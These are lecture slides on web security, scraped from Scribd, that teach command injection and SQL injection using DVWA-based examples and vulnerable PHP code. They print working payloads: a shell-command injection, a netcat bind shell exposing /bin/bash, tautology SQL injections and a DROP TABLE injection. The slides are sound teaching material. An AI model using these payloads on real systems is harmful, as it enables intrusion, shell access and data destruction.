Scribd
Upload
12 views

Web Security

Uploaded by

mc noob
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
12 views

Web Security

Uploaded by

mc noob
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 30

Web Security

Jonathan Burket
Carnegie Mellon University

Credits: Original Slides by David Brumley.


Examples based on DVWA (http://www.dvwa.co.uk/)
Collin Jackson’s Web Security Course
http://caffeinept.blogspot.com/2012/01/dvwa-sql-injection.html
Graphics from The Noun Project
We’re done with Crypto!

Key concepts like authentication, integrity, man-in-


the-middle attacks, etc. will still be important

2
Web Application Overview

subdomain.mysite.com/folder/page?id=5
HTML Page, JS file, CSS file, image, etc.

Database Queries
GET Requests: Used for requests for
pages, resources, etc.

POST Requests: Used for form


submissions, logins, etc.

3
Web Security Overview
(By Threat Model)

Malicious Client Attacking Server


SQL Injection
File System Traversal
Broken Access Control

4
Web Security Overview
(By Threat Model)

Malicious Server Attacking Client


Clickjacking
History Probing
Phishing

5
Web Security Overview
(By Threat Model)

Malicious User Attacking Other Users


Cross-Site Scripting
Cross-Site Request Forgery
Remote Script Inclusion

6
Web Security Overview
(By Threat Model)

Malicious Server in “Mashup” Web Application


Clickjacking
Information Stealing

7
Web Security Overview
(By Threat Model)

Malicious User in Multi-Server Application


Single sign-on (Facebook, Twitter, etc.): Sign in as someone else
Multi-Party Payment (Paypal, Amazon Payments): Buy things for free

8
Injection Flaws

9
“Injection flaws occur when an application
sends untrusted data to an interpreter.”
--- OWASP

Like Buffer Overflow and Format


String Vulnerabilities, A result of
from mixing data and code

https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References 10
1. http://site.com/exec/

Client Server

2. Send page

<h2>Ping for FREE</h2>

<p>Enter an IP address below:</p> Input to form


<form name="ping" action="#" method="post">
<input type="text" name="ip" size="30"> program
<input type="submit" value="submit"
name="submit”>
</form>
11
POST /dvwa/vulnerabilities/exec/ HTTP/1.1
Host: 172.16.59.128
...
ip=127.0.0.1&submit=submit
ip input

Client Server

Send output

$t = $_REQUEST[‘ip'];
$o = shell_exec(‘ping –C 3’ . $t);
echo $o

<h2>Ping for FREE</h2> PHP exec program

<p>Enter an IP address below:</p>


<form name="ping" action="#" method="post">
<input type="text" name="ip" size="30">
<input type="submit" value="submit"
name="submit”>
</form>
12
POST /dvwa/vulnerabilities/exec/ HTTP/1.1
Host: 172.16.59.128
...
ip=127.0.0.1&submit=submit
ip input

Client Server

2. Send page

$t = $_REQUEST[‘ip'];
$o = shell_exec(‘ping –C 3’ . $t);
spot the bug echo $o

PHP exec program

13
POST /dvwa/vulnerabilities/exec/ HTTP/1.1
Host: 172.16.59.128
... “; ls” encoded
ip=127.0.0.1%3b+ls&submit=submit

Client Server

2. Send page

$t = $_REQUEST[‘ip'];
$o = shell_exec(‘ping –C 3’ . $t);
echo $o

PHP exec program

Information
Disclosure
14
Getting a Shell

ip=127.0.0.1+%26+netcat+-v+-e+'/bin/
bash'+-l+-p+31337&submit=submit

netcat –v –e ‘/bin/bash’ –l –p 31337

15
SQL Injection
1
/user.php?id=5

4 “jburket”

3
“jburket”

2 SELECT FROM users where uid=5

16
SQL Injection
1
/user.php?id=-1 or admin=true

4 “adminuser”

3
“adminuser”

2 SELECT FROM users where uid=-1 or admin=true

17
CardSystems Attack
• CardSystems
– credit card payment processing company
– SQL injection attack in June 2005
– put out of business

• The Attack
– 263,000 credit card #s stolen from database
– credit card #s stored unencrypted
– 43 million credit card #s exposed

Image: http://usa.visa.com/merchants/marketing_center/logo_usage.html 18
https://www.mastercardbrandcenter.com/
SQL Primer
A table is defined by a Column 1 Column 2 Column 3
tuple (t1, t2, ..., tn)of typed of Type 1 of Type 2 of Type 3
named values. Each row value 1 value 2 value 3
is a tuple of values value 4 value 5 value 6
(v1:t1, v2:t2, ... vn:tn)
varchar(15)

smallint

user_id first_name last_name user password avatar


1 admin admin admin <hash 1> admin.jpg
2 Gordon Brown gordonb <hash 2> gordonb.jpg
3 Hack Me 1337 <hash 3> hacker.jpg
... ... ... ... ... ...

‘users’ table
19
user_id first_name last_name user password avatar
1 admin admin admin <hash 1> admin.jpg
2 Gordon Brown gordonb <hash 2> gordonb.jpg
3 Hack Me 1337 <hash 3> hacker.jpg
... ... ... ... ... ...
users
user_id comment_i comment
d
1 1 Test Comment
2 2 I like sugar
2 3 But not milk
3 4 Gordon is silly
comments
A schema is a collection of tables
with their intended relations 20
Basic Queries
SELECT <columns> from <db> where
<exp>
Returns all rows from db columns where exp is true
• columns can either be:
– List of comma-separated column names
– “*” for all columns
• db is a comma-separated list of tables
• exp is a Boolean SQL expression
– Single quotes for strings (‘’)
– Integers are specified in the normal way
• Comments are specified:
– Single line: ‘--’ (two dashes) character
– Multi-line: “/*” and “*/” (like C)
– Server-specific, e.g., “#” single-line comment for mysql 21
Example Query
SELECT <columns> from <db> where
<exp>

user_id comment_i comment


select * from comments d
where user_id = 2; 1 1 Test Comment
2 2 I like sugar
2 3 But not milk
3 4 Gordon is silly
comments
2, 2, “I like sugar”
2, 3, “But not milk”

22
Join Example
SELECT <columns> from <db> where
<exp>
user_id first_name last_nam user ...
e
select users.first_name, 1 admin admin admin ...
comments.comment
2 Gordon Brown gordonb ...
from users, comments user_id comment_i comment
where d
users.user_id=comments 1 1 Test Comment
.user_id 2 2 I like sugar
and users.user_id = 2; 2 3 But not milk
3 4 Gordon is silly

Gordon“I like sugar” Join two tables


Gordon“But not milk”
23
Tautologies
SELECT <columns> from <db> where
<exp>

select * from
comments where user_id comment_i comment
user_id = 2 d
1 1 Test Comment
OR 1= 1;
2 2 I like sugar
2 3 But not milk
3 4 Gordon is silly
1, 1, “Test Comment” comments
2, 2, “I like sugar”
Tautologies often
2, 3, “But not milk”
used in real attacks
3, 4, “Gordon is silly” 24
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM
users
WHERE user_id = $id";
$result = mysql_query($getid) or die('<pre>' .
mysql_error() . '</pre>' );

Guess as to the exploit?

25
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM
users
WHERE user_id = $id";
$result = mysql_query($getid) or die('<pre>' .
mysql_error() . '</pre>' );

Solution: 1 or 1=1;

26
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM
users
WHERE user_id = ‘$id’";
$result = mysql_query($getid) or die('<pre>' .
mysql_error() . '</pre>' );

Does quoting make it safe?

Hint: Comments are specified:


• Single line: ‘--’ (two dashes) character
• Multi-line: “/*” and “*/”
• “#” single-line comment for mysql

27
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM
users
WHERE user_id = ‘$id’";
$result = mysql_query($getid) or die('<pre>' .
mysql_error() . '</pre>' );

1’ OR 1=1;#

28
Even worse

$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM
users
WHERE user_id = ‘$id’";
$result = mysql_query($getid) or die('<pre>' .
mysql_error() . '</pre>' );

1′ ; DROP TABLE Users ; -- #

Command not verified, but you get the idea


29
30

You might also like